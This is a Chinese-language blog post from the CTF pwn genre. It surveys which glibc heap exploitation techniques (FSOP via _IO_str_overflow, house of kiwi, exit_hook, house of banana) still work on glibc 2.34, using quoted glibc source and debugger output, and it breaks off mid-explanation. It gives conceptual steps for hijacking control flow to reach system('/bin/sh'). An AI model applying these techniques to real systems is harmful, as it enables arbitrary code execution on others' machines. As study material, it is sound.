
<!DOCTYPE html>
<html lang="en" class="loading">
<head>
    <meta charset="UTF-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" />
    <meta name="viewport" content="width=device-width, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no">
    <title>高版本glibc堆的几种利用手法 - Dreamcat</title>
    <meta name="apple-mobile-web-app-capable" content="yes" />
    <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
    <meta name="google" content="notranslate" />
    <meta name="keywords" content="Fechin,"> 
    <meta name="description" content="Glibc     高版本前言：​        本文旨在讲述在glibc 2.34ubuntu 高版本下（2.34-0ubuntu3.2）的一些利用手法是否依旧可以使用。会对某些手法进行概括，并没,"> 
    <meta name="author" content="dreamcat"> 
    <link rel="alternative" href="atom.xml" title="Dreamcat" type="application/atom+xml"> 
    <link rel="icon" href="/img/favicon.png"> 
    
    
    
    <meta name="twitter:card" content="summary"/>
    <meta name="twitter:title" content="高版本glibc堆的几种利用手法 - Dreamcat"/>
    <meta name="twitter:description" content="Glibc     高版本前言：​        本文旨在讲述在glibc 2.34ubuntu 高版本下（2.34-0ubuntu3.2）的一些利用手法是否依旧可以使用。会对某些手法进行概括，并没,"/>
    
    
    
    
    <meta property="og:site_name" content="Dreamcat"/>
    <meta property="og:type" content="object"/>
    <meta property="og:title" content="高版本glibc堆的几种利用手法 - Dreamcat"/>
    <meta property="og:description" content="Glibc     高版本前言：​        本文旨在讲述在glibc 2.34ubuntu 高版本下（2.34-0ubuntu3.2）的一些利用手法是否依旧可以使用。会对某些手法进行概括，并没,"/>
    
<link rel="stylesheet" href="/css/diaspora.css">

<meta name="generator" content="Hexo 6.1.0"></head>

<body class="loading">
    <span id="config-title" style="display:none">Dreamcat</span>
    <div id="loader"></div>
    <div id="single">
    <div id="top" style="display: block;">
    <div class="bar" style="width: 0;"></div>
    <a class="iconfont icon-home image-icon" href="javascript:;" data-url="http://example.com"></a>
    <div title="播放/暂停" class="iconfont icon-play"></div>
    <h3 class="subtitle">高版本glibc堆的几种利用手法</h3>
    <div class="social">
        <div>
            <div class="share">
                <a title="获取二维码" class="iconfont icon-scan" href="javascript:;"></a>
            </div>
            <div id="qr"></div>
        </div>
    </div>
    <div class="scrollbar"></div>
</div>

    <div class="section">
        <div class="article">
    <div class='main'>
        <h1 class="title">高版本glibc堆的几种利用手法</h1>
        <div class="stuff">
            <span>六月 03, 2022</span>
            
  <ul class="post-tags-list" itemprop="keywords"><li class="post-tags-list-item"><a class="post-tags-list-link" href="/tags/pwn/" rel="tag">pwn</a></li></ul>


        </div>
        <div class="content markdown">
            <h1 id="Glibc-高版本"><a href="#Glibc-高版本" class="headerlink" title="Glibc     高版本"></a>Glibc     高版本</h1><h2 id="前言："><a href="#前言：" class="headerlink" title="前言："></a>前言：</h2><p>​        本文旨在讲述在glibc 2.34ubuntu 高版本下（2.34-0ubuntu3.2）的一些利用手法是否依旧可以使用。会对某些手法进行概括，并没有对其进行深入透彻的讲述。感兴趣的朋友可以自行学习，最后详细介绍了house of banana.</p>
<p>我只是站在了前任师傅的高台上，为大家进行一些总结分析。</p>
<p>​        前不久打算深入的去了解在2.34以及2.35这两个较高版本的glibc的堆漏洞的利用。</p>
<h2 id="2-34-2-35-如何利用"><a href="#2-34-2-35-如何利用" class="headerlink" title="2.34(2.35) 如何利用"></a>2.34(2.35) 如何利用</h2><h3 id="一些对比"><a href="#一些对比" class="headerlink" title="一些对比"></a>一些对比</h3><p>2.34与2.35其实非常接近，一般情况下，我们利用的手法也都是一致的，除了继承了2.29以来 的各种保护机制，2.34开始最大的特点，就是删除了__free_hook</p>
<p>__malloc_hook</p>
<p>__realloc_hook</p>
<p>__memalign_hook</p>
<p>__after_morecore_hook</p>
<p>这几个常用的钩子函数，而我们最常用的malloc_hook 以及free_hook被完全的禁止了（虽然我们依旧可以在程序中找到对应的符号，但是相关的函数不在对其进行调用），我们只能另寻出路。其实在2.29以后的版本中，很多手法都已经失效了，我们常用的无外乎就是劫持程序执行流，以及输入输出流。在2.23的版本中，我们是可以修改vtable，但是2.24后就禁止修改，以及再到后面的一些版本还会检查我们的vtable是否在允许的范围中（所有的vtable储存在一个数组中，以__start_libc_IO_vtables 开始，__stop_libc_IO_vtables结束）。</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line">_IO_vtable_check (<span class="type">void</span>)</span><br><span class="line">&#123;</span><br><span class="line"><span class="meta">#<span class="keyword">ifdef</span> SHARED</span></span><br><span class="line">  <span class="comment">/* Honor the compatibility flag.  */</span></span><br><span class="line">  <span class="type">void</span> (*flag) (<span class="type">void</span>) = atomic_load_relaxed (&amp;IO_accept_foreign_vtables);</span><br><span class="line"><span class="meta">#<span class="keyword">ifdef</span> PTR_DEMANGLE</span></span><br><span class="line">  PTR_DEMANGLE (flag);</span><br><span class="line"><span class="meta">#<span class="keyword">endif</span></span></span><br><span class="line">  <span class="keyword">if</span> (flag == &amp;_IO_vtable_check)</span><br><span class="line">    <span class="keyword">return</span>;</span><br><span class="line"></span><br><span class="line">  <span class="comment">/* In case this libc copy is in a non-default namespace, we always</span></span><br><span class="line"><span class="comment">     need to accept foreign vtables because there is always a</span></span><br><span class="line"><span class="comment">     possibility that FILE * objects are passed across the linking</span></span><br><span class="line"><span class="comment">     boundary.  */</span></span><br><span class="line">  &#123;</span><br><span class="line">    Dl_info di;</span><br><span class="line">    <span class="class"><span class="keyword">struct</span> <span class="title">link_map</span> *<span class="title">l</span>;</span></span><br><span class="line">    <span class="keyword">if</span> (!rtld_active ()</span><br><span class="line">        || (_dl_addr (_IO_vtable_check, &amp;di, &amp;l, <span class="literal">NULL</span>) != <span class="number">0</span></span><br><span class="line">            &amp;&amp; l-&gt;l_ns != LM_ID_BASE))</span><br><span class="line">      <span class="keyword">return</span>;</span><br><span class="line">  &#125;</span><br></pre></td></tr></table></figure>

<p>但是，在2.34的早期版本又是可以写的（glibc-2.34-0ubuntu1_amd64）</p>
<p><img src="/.com//myBLOG\blog\source_posts\高版本glibc堆的几种利用手法\p1-16559541718371.jpg"></p>
<p>这个时候我们可以尝试攻击vtable结构体，达到getshell的目的。</p>
<p>但是在后面的几次更新中，又将修复了这个漏洞，在(Ubuntu GLIBC 2.34-0ubuntu3.2) 2.34版本中，就不可以修改（目前已知在2.340ubuntu3版本以及之前的版本依旧有可写的权限）</p>
<p><img src="/.com//myBLOG\blog\source_posts\高版本glibc堆的几种利用手法\p2-16559541718382.png" alt="image-20220526115356060"></p>
<p>我们可以找到很多关于如何绕过vtable check的办法进行劫持IO流，其中最主流的还是利用 _IO_str_jumps  和 _IO_wstr_jumps两个虚表，</p>
<p>二者利用几乎一样。我们在源码 &#x2F;libio&#x2F;strops.c 可以看到相关的vatable的内容，以下我以_IO_str_jumps 作主要说明。</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">const</span> <span class="class"><span class="keyword">struct</span> _<span class="title">IO_jump_t</span> _<span class="title">IO_str_jumps</span> <span class="title">libio_vtable</span> =</span></span><br><span class="line">&#123;</span><br><span class="line">  JUMP_INIT_DUMMY,</span><br><span class="line">  JUMP_INIT(finish, _IO_str_finish),</span><br><span class="line">  JUMP_INIT(overflow, _IO_str_overflow),</span><br><span class="line">  JUMP_INIT(underflow, _IO_str_underflow),</span><br><span class="line">  JUMP_INIT(uflow, _IO_default_uflow),</span><br><span class="line">  JUMP_INIT(pbackfail, _IO_str_pbackfail),</span><br><span class="line">  JUMP_INIT(xsputn, _IO_default_xsputn),</span><br><span class="line">  JUMP_INIT(xsgetn, _IO_default_xsgetn),</span><br><span class="line">  JUMP_INIT(seekoff, _IO_str_seekoff),</span><br><span class="line">  JUMP_INIT(seekpos, _IO_default_seekpos),</span><br><span class="line">  JUMP_INIT(setbuf, _IO_default_setbuf),</span><br><span class="line">  JUMP_INIT(sync, _IO_default_sync),</span><br><span class="line">  JUMP_INIT(doallocate, _IO_default_doallocate),</span><br><span class="line">  JUMP_INIT(read, _IO_default_read),</span><br><span class="line">  JUMP_INIT(write, _IO_default_write),</span><br><span class="line">  JUMP_INIT(seek, _IO_default_seek),</span><br><span class="line">  JUMP_INIT(close, _IO_default_close),</span><br><span class="line">  JUMP_INIT(stat, _IO_default_stat),</span><br><span class="line">  JUMP_INIT(showmanyc, _IO_default_showmanyc),</span><br><span class="line">  JUMP_INIT(imbue, _IO_default_imbue)</span><br><span class="line">&#125;;</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>这里面有两个很有用的函数  </p>
<p>JUMP_INIT(finish, _IO_str_finish),<br>JUMP_INIT(overflow, _IO_str_overflow),</p>
<p>相关源码如下</p>
<h4 id="IO-str-finish"><a href="#IO-str-finish" class="headerlink" title="_IO_str_finish"></a>_IO_str_finish</h4><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//Glibc 2.34</span></span><br><span class="line"><span class="type">void</span></span><br><span class="line">_IO_str_finish (FILE *fp, <span class="type">int</span> dummy)</span><br><span class="line">&#123;</span><br><span class="line">  <span class="keyword">if</span> (fp-&gt;_IO_buf_base &amp;&amp; !(fp-&gt;_flags &amp; _IO_USER_BUF))</span><br><span class="line">    <span class="built_in">free</span> (fp-&gt;_IO_buf_base);</span><br><span class="line">  fp-&gt;_IO_buf_base = <span class="literal">NULL</span>;</span><br><span class="line"></span><br><span class="line">  _IO_default_finish (fp, <span class="number">0</span>);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>这里我们值得注意的是_IO_str_finish，在之前版本中，函数中其实是存在任意函数执行的漏洞的</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//Glibc 2.31</span></span><br><span class="line"><span class="type">void</span></span><br><span class="line">_IO_str_finish (_IO_FILE *fp, <span class="type">int</span> dummy)</span><br><span class="line">&#123;</span><br><span class="line">  <span class="keyword">if</span> (fp-&gt;_IO_buf_base &amp;&amp; !(fp-&gt;_flags &amp; _IO_USER_BUF))</span><br><span class="line">    (((_IO_strfile *) fp)-&gt;_s._free_buffer) (fp-&gt;_IO_buf_base); <span class="comment">//我们控制 _free_buffer 为目标函数，就达到了任意执行</span></span><br><span class="line">  fp-&gt;_IO_buf_base = <span class="literal">NULL</span>;</span><br><span class="line">  </span><br><span class="line">  _IO_default_finish (fp, <span class="number">0</span>);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>但是在新版本的函数中，将这部分删除了，所以我们无法通过这里getshell.</p>
<h4 id="IO-str-overflow"><a href="#IO-str-overflow" class="headerlink" title="_IO_str_overflow"></a>_IO_str_overflow</h4><p>2.34对比之前的版本，这里并没有太大的变化，但是因为没有了free_hook事情变得不容乐观</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">int</span></span><br><span class="line">_IO_str_overflow (FILE *fp, <span class="type">int</span> c)</span><br><span class="line">&#123;</span><br><span class="line">  <span class="type">int</span> flush_only = c == EOF;</span><br><span class="line">  <span class="type">size_t</span> pos;</span><br><span class="line">  <span class="keyword">if</span> (fp-&gt;_flags &amp; _IO_NO_WRITES)</span><br><span class="line">      <span class="keyword">return</span> flush_only ? <span class="number">0</span> : EOF;</span><br><span class="line">  <span class="keyword">if</span> ((fp-&gt;_flags &amp; _IO_TIED_PUT_GET) &amp;&amp; !(fp-&gt;_flags &amp; _IO_CURRENTLY_PUTTING))</span><br><span class="line">    &#123;</span><br><span class="line">      fp-&gt;_flags |= _IO_CURRENTLY_PUTTING;</span><br><span class="line">      fp-&gt;_IO_write_ptr = fp-&gt;_IO_read_ptr;</span><br><span class="line">      fp-&gt;_IO_read_ptr = fp-&gt;_IO_read_end;</span><br><span class="line">    &#125;</span><br><span class="line">  pos = fp-&gt;_IO_write_ptr - fp-&gt;_IO_write_base;</span><br><span class="line">  <span class="keyword">if</span> (pos &gt;= (<span class="type">size_t</span>) (_IO_blen (fp) + flush_only))</span><br><span class="line">    &#123;</span><br><span class="line">      <span class="keyword">if</span> (fp-&gt;_flags &amp; _IO_USER_BUF) <span class="comment">/* not allowed to enlarge */</span></span><br><span class="line">	<span class="keyword">return</span> EOF;</span><br><span class="line">      <span class="keyword">else</span></span><br><span class="line">	&#123;</span><br><span class="line">	  <span class="type">char</span> *new_buf;</span><br><span class="line">	  <span class="type">char</span> *old_buf = fp-&gt;_IO_buf_base;</span><br><span class="line">	  <span class="type">size_t</span> old_blen = _IO_blen (fp);</span><br><span class="line">	  <span class="type">size_t</span> new_size = <span class="number">2</span> * old_blen + <span class="number">100</span>;</span><br><span class="line">	  <span class="keyword">if</span> (new_size &lt; old_blen)</span><br><span class="line">	    <span class="keyword">return</span> EOF;</span><br><span class="line">	  new_buf = <span class="built_in">malloc</span> (new_size);</span><br><span class="line">	  <span class="keyword">if</span> (new_buf == <span class="literal">NULL</span>)</span><br><span class="line">	    &#123;</span><br><span class="line">	      <span class="comment">/*	  __ferror(fp) = 1; */</span></span><br><span class="line">	      <span class="keyword">return</span> EOF;</span><br><span class="line">	    &#125;</span><br><span class="line">	  <span class="keyword">if</span> (old_buf)</span><br><span class="line">	    &#123;</span><br><span class="line">	      <span class="built_in">memcpy</span> (new_buf, old_buf, old_blen);</span><br><span class="line">	      <span class="built_in">free</span> (old_buf);</span><br><span class="line">	      <span class="comment">/* Make sure _IO_setb won&#x27;t try to delete _IO_buf_base. */</span></span><br><span class="line">	      fp-&gt;_IO_buf_base = <span class="literal">NULL</span>;</span><br><span class="line">	    &#125;</span><br><span class="line">	  <span class="built_in">memset</span> (new_buf + old_blen, <span class="string">&#x27;\0&#x27;</span>, new_size - old_blen);</span><br><span class="line"></span><br><span class="line">	  _IO_setb (fp, new_buf, new_buf + new_size, <span class="number">1</span>);</span><br><span class="line">	  fp-&gt;_IO_read_base = new_buf + (fp-&gt;_IO_read_base - old_buf);</span><br><span class="line">	  fp-&gt;_IO_read_ptr = new_buf + (fp-&gt;_IO_read_ptr - old_buf);</span><br><span class="line">	  fp-&gt;_IO_read_end = new_buf + (fp-&gt;_IO_read_end - old_buf);</span><br><span class="line">	  fp-&gt;_IO_write_ptr = new_buf + (fp-&gt;_IO_write_ptr - old_buf);</span><br><span class="line"></span><br><span class="line">	  fp-&gt;_IO_write_base = new_buf;</span><br><span class="line">	  fp-&gt;_IO_write_end = fp-&gt;_IO_buf_end;</span><br><span class="line">	&#125;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">  <span class="keyword">if</span> (!flush_only)</span><br><span class="line">    *fp-&gt;_IO_write_ptr++ = (<span class="type">unsigned</span> <span class="type">char</span>) c;</span><br><span class="line">  <span class="keyword">if</span> (fp-&gt;_IO_write_ptr &gt; fp-&gt;_IO_read_end)</span><br><span class="line">    fp-&gt;_IO_read_end = fp-&gt;_IO_write_ptr;</span><br><span class="line">  <span class="keyword">return</span> c;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>​    2.34前的版本中，我们在利用FSOP劫持_IO_list_all 的值来伪造链表和其中的IO_FILE 项。</p>
<p>​    当程序执行exit函数，或者从main函数返回时，会执行调用_IO_flush_all_lockp，这个函数会刷新_IO_list_all 链表中所有项的文件流，相当于对每个 FILE 调用 fflush，也对应着会调用_IO_FILE_plus.vtable 中的_IO_overflow。<br>因而当设置stdout对应的_IO_FILE 对应的 vtable 为 _IO_str_jumps<br>执行exit就会执行，_IO_str_overflow,</p>
<p>利用思路是根据这里面连续的malloc,memcpy,free，通过控制、伪造IO_FILE，我们要伪造一个fake_chunk,使得函数调用malloc时可以得到fake_chunk,然后再fake_chunk写入我们的数据（来自_IO_buf_base），一般我们把free_hook作为fake_chunk进行攻击，(这也是攻击陈工的前提)，将free_hook覆盖为system,执行system(“&#x2F;bin&#x2F;sh”).这里我们布置的时fake_chunk的用户区域为free_hook-0x10,这样，_IO_buf_base的前8字节为”&#x2F;bin&#x2F;sh\x00“,接下来的8字节时system的地址，这样free(fake_chunk) &#x3D;&#x3D;&#x3D;&gt;system(fakechunk),完成了free_hook的覆盖以及getshell。</p>
<h4 id="house-of-kiwi"><a href="#house-of-kiwi" class="headerlink" title="house of kiwi"></a>house of kiwi</h4><p>当程序没有显示调用exit，也不会通过主函数返回，那么以往我们使用的FSOP就无法进行了，如果此时两个hook也没法利用，我们需要一种能够稳定触发IO中函数的路径，这就是house of kiwi,它利用了__malloc_assert.</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">static</span> <span class="type">void</span></span><br><span class="line">__malloc_assert (<span class="type">const</span> <span class="type">char</span> *assertion, <span class="type">const</span> <span class="type">char</span> *file, <span class="type">unsigned</span> <span class="type">int</span> line,</span><br><span class="line">		 <span class="type">const</span> <span class="type">char</span> *function)</span><br><span class="line">&#123;</span><br><span class="line">  (<span class="type">void</span>) __fxprintf (<span class="literal">NULL</span>, <span class="string">&quot;%s%s%s:%u: %s%sAssertion `%s&#x27; failed.\n&quot;</span>,</span><br><span class="line">		     __progname, __progname[<span class="number">0</span>] ? <span class="string">&quot;: &quot;</span> : <span class="string">&quot;&quot;</span>,</span><br><span class="line">		     file, line,</span><br><span class="line">		     function ? function : <span class="string">&quot;&quot;</span>, function ? <span class="string">&quot;: &quot;</span> : <span class="string">&quot;&quot;</span>,</span><br><span class="line">		     assertion);</span><br><span class="line">  fflush (<span class="built_in">stderr</span>);</span><br><span class="line">  <span class="built_in">abort</span> ();</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>从源码中可以看到这个断言中调用了fflush(stderr)，这个函数会稳定的调用_IO_file_jumps中的sync<br>在house of kiwi 中，如果我们能实现一个任意地址写，那么就可以修改sync指针，并且在调用的时候还发现，rdx也很稳定的是IO_helper_jumps，此时如果我们通过任意地址写将sync指针改成IO_helper_jumps，且将IO_helper_jumps+0xa0和IO_helper_jumps+0xa8改写，就可以实现栈迁移orw。在更新的版本中，相关的虚表已经不可以写了。</p>
<h4 id="小结："><a href="#小结：" class="headerlink" title="小结："></a>小结：</h4><p>但是这些2.34更新的版本中（比如glibcubuntu3.2）下都失效了，因为没有了free_hook，也就没有了上述的一系列手法，而且以上依赖fflush()函数，通常我们需要利用exit函数来执行该调用。到此我们宣告上述利用手法，失效。但是比赛目前还没有变态到这种程度，常见的还是2.34的早期版本上述手法部分依旧可以实现。</p>
<h2 id="解决方案"><a href="#解决方案" class="headerlink" title="解决方案"></a>解决方案</h2><p>难道pwn到此就结束了吗？我们回头梳理下，以上攻击方式失败的原因，无外乎就是没有了hook函数以及vtable不可写。但是我们回到最开始学习pwn，其实最简单的还是rop,在高版本中我们是否可以结合stack与heap的攻击？或者我们是否还有其他的办法劫持程序的控制流？</p>
<h3 id="house-of-banana"><a href="#house-of-banana" class="headerlink" title="house of banana"></a>house of banana</h3><p>house of banana 是ha1vk师傅在2020年总结出来的利用链。不同于_IO_IO_str   和_overflow,_IO_str_overflow。banana攻击的是rtld_global结构体中的link_map指针，</p>
<p>攻击的位置houm是在程序结束后调用exit，或者程序由libc_start_main启动，并且主函数可以正常结束返回。（这里提到了exit，不得不提一下以往的攻击exit_hook，配合onegadget获得shell，目前为止，到glibc2.34ubuntu3依旧可以利用，但是在3.2版本下该地址没有了可写权限，所以失效了）</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//2.34 0ubuntu3.2</span></span><br><span class="line">RAX  <span class="number">0x1</span></span><br><span class="line"> RBX  <span class="number">0x7ffff7fad9f8</span> (__elf_set___libc_atexit_element__IO_cleanup__) —▸ <span class="number">0x7ffff7e26b10</span> (_IO_cleanup) ◂— endbr64 </span><br><span class="line"> RCX  <span class="number">0x0</span></span><br><span class="line"> RDX  <span class="number">0x1</span></span><br><span class="line"> RDI  <span class="number">0x555555558148</span> ◂— <span class="number">0x0</span></span><br><span class="line">```</span><br><span class="line"><span class="number">0x7ffff7ddd58f</span> &lt;__run_exit_handlers+<span class="number">431</span>&gt;    nop    </span><br><span class="line"> ► <span class="number">0x7ffff7ddd590</span> &lt;__run_exit_handlers+<span class="number">432</span>&gt;    call   qword ptr [rbx]               &lt;_IO_cleanup&gt;</span><br><span class="line">        rdi: <span class="number">0x555555558148</span> ◂— <span class="number">0x0</span></span><br><span class="line">        rsi: <span class="number">0x0</span></span><br><span class="line">        rdx: <span class="number">0x1</span></span><br><span class="line">        rcx: <span class="number">0x0</span></span><br><span class="line">```</span><br><span class="line">pwndbg&gt; vmmap <span class="number">0x7ffff7fad9f8</span></span><br><span class="line">LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA</span><br><span class="line">    <span class="number">0x7ffff7fad000</span>     <span class="number">0x7ffff7fb1000</span> r--p     <span class="number">4000</span> <span class="number">214000</span> /usr/lib/x86_64-linux-gnu/libc.so<span class="number">.6</span> +<span class="number">0x9f8</span></span><br><span class="line">pwndbg&gt; x <span class="number">0x7ffff7fad9f8</span></span><br><span class="line"><span class="number">0x7ffff7fad9f8</span> &lt;__elf_set___libc_atexit_element__IO_cleanup__&gt;:	<span class="number">0xf7e26b10</span></span><br><span class="line"></span><br></pre></td></tr></table></figure>



<p>house of banana 相较于以往的攻击手法，其实思路很明确。在程序通过显式调用exit，或者main函数是由__libc_start_main唤起，并可以正常的返回时，由于动态链接的加载机制，程序中并没有exit函数的真实调用，而是要通过符号表来获得真实的函数地址。（有关动态链接延迟绑定的技术，还请自行查阅，这里不做过多的阐述。）我们联想到ret2_dl_resolve技术。</p>
<p>下面是exit执行的一个过程</p>
<h5 id="exit-gt-dl-fini-gt-fini-t-array-i"><a href="#exit-gt-dl-fini-gt-fini-t-array-i" class="headerlink" title="exit -&gt; _dl_fini -&gt;((fini_t) array[i]) ();"></a>exit -&gt; _dl_fini -&gt;((fini_t) array[i]) ();</h5><p>​        banana手法，通过伪造修改相关的表项，以达到调用后门来获得权限。这里我们重点说一下，在ubuntu3.2下利用的可行性。大多数师傅对于banana的攻击方式主要有两种，一是攻击_rtld_global这个全局符号所保存的link_map的链表。伪造整个链表，进行劫持。相关的全局变量是可以写的。后面会解释这个变量的用处。</p>
<p><img src="/.com//myBLOG\blog\source_posts\高版本glibc堆的几种利用手法\p3-16559541718383.png" alt="image-20220601030100775"></p>
<p>另外一个与之相比破坏性比较小，更容易成功。由于link_map通过链表链接，但是在加载exit的时候，相关函数智慧通过link_map-&gt;l_next指针进行相关的检查。我们可以在某个特定的位置，更改next指针，将下一以链表节点转为我们控制的地方，比如heap上。</p>
<p>​    很多朋友看了上面的可能会比较蒙，下面我具体说一参数。</p>
<p>关于link_map,我们攻击exit时，会使用到一个link_map 的链表，链表的一些信息保存在struct rtld_global结构体中，这个结构体信息很多，很繁杂，但是banana只用到了几个关键的点。</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br></pre></td><td class="code"><pre><span class="line">pwndbg&gt; p &amp;_rtld_global</span><br><span class="line">$<span class="number">1</span> = (<span class="keyword">struct</span> rtld_global *) <span class="number">0x7f56e43b9040</span> &lt;_rtld_global&gt;</span><br><span class="line">    <span class="comment">//以下是结构体信息的展开，pwndbg为我们做了整理</span></span><br><span class="line">pwndbg&gt; p _rtld_global</span><br><span class="line">$<span class="number">2</span> = &#123;</span><br><span class="line">  _dl_ns = &#123;&#123;</span><br><span class="line">      _ns_loaded = <span class="number">0x7f56e43ba220</span>,				<span class="comment">//#1</span></span><br><span class="line">      _ns_nloaded = <span class="number">4</span>,						<span class="comment">//#2</span></span><br><span class="line">      _ns_main_searchlist = <span class="number">0x7f56e43ba4e0</span>,</span><br><span class="line">      _ns_global_scope_alloc = <span class="number">0</span>,</span><br><span class="line">      _ns_global_scope_pending_adds = <span class="number">0</span>,</span><br><span class="line">      libc_map = <span class="number">0x7f56e4382000</span>,</span><br><span class="line">      _ns_unique_sym_table = &#123;</span><br><span class="line">        lock = &#123;</span><br><span class="line">          mutex = &#123;</span><br><span class="line">            __data = &#123;</span><br><span class="line">              __lock = <span class="number">0</span>,</span><br><span class="line">              __count = <span class="number">0</span>,</span><br><span class="line">              __owner = <span class="number">0</span>,</span><br><span class="line">              __nusers = <span class="number">0</span>,</span><br><span class="line">              __kind = <span class="number">1</span>,</span><br><span class="line">              __spins = <span class="number">0</span>,</span><br><span class="line">              __elision = <span class="number">0</span>,</span><br><span class="line">              __list = &#123;</span><br><span class="line">                __prev = <span class="number">0x0</span>,</span><br><span class="line">                __next = <span class="number">0x0</span></span><br><span class="line">              &#125;</span><br><span class="line">            &#125;,</span><br><span class="line">            __size = <span class="string">&#x27;\000&#x27;</span> &lt;repeats <span class="number">16</span> times&gt;, <span class="string">&quot;\001&quot;</span>, <span class="string">&#x27;\000&#x27;</span> &lt;repeats <span class="number">22</span> times&gt;,</span><br><span class="line">            __align = <span class="number">0</span></span><br><span class="line">          &#125;</span><br><span class="line">....    </span><br><span class="line">  <span class="comment">//展开数据会很多，但是只是对链表个节点信息的汇总</span></span><br></pre></td></tr></table></figure>

<p>我们需要关注的是，</p>
<p>​    #1，_ns_loaded &#x3D; 0x7f56e43ba220,    这是整个链表的头节点，</p>
<p>​    #2， _ns_nloaded &#x3D; 4, 这里知名个这个链表的节点个数，在exit后面加载的检查中，会要求_ns_nloaded链表的节点不少于3个</p>
<p>（后面我会给出相关的源码）</p>
<p>然后对于每个节点，都是link_map结构体，我们利用第一个节点做一下简单说明(省略了部分无关的数据)</p>
